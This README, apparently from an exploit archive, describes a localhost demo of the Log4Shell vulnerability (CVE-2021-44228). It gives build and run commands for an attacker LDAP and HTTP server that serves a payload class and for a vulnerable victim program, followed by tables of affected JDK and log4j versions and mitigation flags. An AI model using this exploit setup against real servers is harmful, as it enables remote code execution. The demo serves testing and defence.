Share
## https://sploitus.com/exploit?id=371D4A15-51B5-520B-B31D-856E557695FD
# sample-ldap-exploit
A short demo of CVE-2021-44228
## Build
~~~
$ mvn clean verify
~~~
## Run Attacker
~~~
$ java \
-cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
~~~
URLs:
- `http://localhost:8080/`
- `http://localhost:8080/sample/payload/Payload.class`
## Run Victim
~~~
$ java \
-cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
sample.victim.Victim
~~~
## Results
### JDK / JRE
| Version | Status |
|----------------------------------|----------------------------------------------------------------------------|
| `Oracle JDK 8u5` | vulnerable |
| `OpenJDK 8u312` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `IBM OpenJDK 8u312-b07 (OpenJ9)` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.7+10` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.13+8` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 16+36` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17+35` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17.0.1+12` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
If NOT vulnerable, an instance of `javax.naming.Reference` is returned from `javax.naming.Context.lookup()`.
If NOT vulnerable to loading classes from remote code bases,
other **Java deserialization vulnerabilities probably still exist**!
### log4j
| Version | Status |
|----------|-------------------------------------------------------------------------------------------------------------------|
| `2.9.1` | vulnerable |
| `2.10.0` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.14.1` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.15.0` | NOT vulnerable |
If NOT vulnerable, `${jndi:ldap:...}` is NOT resolved.